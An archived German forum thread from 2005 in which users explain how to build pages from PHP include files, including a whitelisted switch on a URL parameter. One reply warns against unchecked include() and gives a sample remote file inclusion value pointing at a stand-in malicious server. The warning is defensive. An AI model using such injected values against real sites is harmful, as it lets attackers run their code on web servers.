PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Wie includen (top.html, bottom.html ...) ?


Stan84
2005-08-12, 12:01:52
Hi

Wenn ich in eine Seite die top.html und bottom.html includen will, muss die Seite ja php sein oder? Wie ist es dann bei der index.html Seite? Die kann ich ja nicht php nennen, weil sonst diese Seite gar nicht als Startseite gefunden wird. Die Überlegung, ein Splash zu machen, lass ich mal bewusst weg. Denn ich möchte direkt, dass die index.php Seite geladen wird, wenn man auf die Seite kommt.

Wie stelle ich das an?

Und dann hab ich noch eine weitere Frage: In top.html gehört ja bekanntlich der Kopf der Webseite, in Bottom der Fuss. Doch ich hab eine Linke Spalte zwischen Top und Bottom, welche auch immer auf jeder Seite gleich bleibt. Wie kann ich die Includen?

Danke schonmal!

Coda
2005-08-12, 12:12:02
index.php wird vom Webserver normal sehr wohl als Startseite gefunden, ansonsten kannst du per .htaccess mit Inhalt "DirectoryIndex index.php" nachhelfen.

Und dann hab ich noch eine weitere Frage: In top.html gehört ja bekanntlich der Kopf der Webseite, in Bottom der Fuss. Doch ich hab eine Linke Spalte zwischen Top und Bottom, welche auch immer auf jeder Seite gleich bleibt. Wie kann ich die Includen?Dazwischen? :|

Stan84
2005-08-12, 12:34:26
Oh tatsächlich, ich hatte eben index.html und index.php auf dem Server, logisch wird dann standardmässig die html Seite angezeigt.

Ja das mit der linken Spaltze dazwischen kannst du dir so vorstellen:

http://img359.imageshack.us/img359/2581/includen1xz.jpg

Coda
2005-08-12, 12:37:35
Ja, dann machst du halt noch left.html und fügst sie zwischen top und bottom ein, wo ist das Problem?

ravage
2005-08-12, 13:54:35
Am besten erstellst du das Design der Seite einmal komplett in einem File, und erst dann teilst du diese Seite in einzelne Files auf. Das macht die Sach viel einfacher :)

GloomY
2005-08-12, 14:08:07
Solche Fragen bitte im Webdesign Forum stellen. :)

*verschieb*

Coda
2005-08-12, 14:11:07
Was ist an PHP denn bitte Webdesign? :|

ravage
2005-08-12, 14:21:43
Naja er will ne Webseite erstellen, und
<?php
include("head.html");
?>
ist kein Programmieren. Genausowenig wie es .htaccess dateien sind.

Ausserdem wird er in diesem Forum wohl mindestens genauso schnell Hilfe finden.

/ps. Ich hab mit dem Verschieben aber nix am Hut ;)

z3ck3
2005-08-12, 17:46:49
Du kannst das auch so machen, das du in der index.php das Grundgerüst deiner Seite speicherst, und an der Stelle an der der Content stehen soll dann mit switch($site) den Inhalt aus einer anderen Datei includest.


Beispiel:

(Verzeichnisstruktur)
/index.php
/includes/startseite.php
/includes/kontakt.php
/includes/impressum.php


index.php

<html>
<head><title>testseite</title></head>
<body>

<div>Logo Logo Logo</div>

<table>
<tr>
<td>
Menu<br>
<a href="index.php">Startseite</a><br>
<a href="index.php?site=kontakt">Kontakt</a><br>
<a href="index.php?site=impressum">Impressum</a><br>
</td>
<td>
<?
// Content wählen

if (!empty($_GET["site"])) {
$site = trim($_GET["site"]);
} else {
$site = "startseite";
}

switch ($site) {
case "startseite":
include("includes/startseite.php");
break;
case "impressum":
include("includes/impressum.php");
break;
case "kontakt":
include("includes/kontakt.php");
break;
default:
include("includes/startseite.php");
break;
}

?>
</td>
</tr>
</table>



Die Inhalte der startseite.php, der kontakt.php und der impressum.php sind beliebig zu wählen.

(Scipt nicht auf Funktion überprüft)

/dev/NULL
2005-08-12, 18:17:00
Was Du niemals machen solltest ist ein ungeprüftes:
include("$site");

Da hast Du schneller nen ungebetene Gast auf dem Server als Du schauen kannst. Trau niemals eingaben die vom Browser kommen..

da schreibt jemand
?site=http://www.boeserserver.com/ganzböses.php und schon hängt er mit rechten des Webservers bei dir ab ;)

z3ck3
2005-08-12, 18:46:04
einspruch!

http://www.boeserserver.com

Das ja diskriminierend! Server können nicht böse sein! Noch nicht *g*


SRY4OT :)

/dev/NULL
2005-08-12, 19:52:07
Auf jedenfall können sie deprimiert sein:
http://web1.server1.webplus24.de/fehlerseite.htm

und zu dem Server: ich wollte ja nicht gleich direkt den link zum script posten ;-)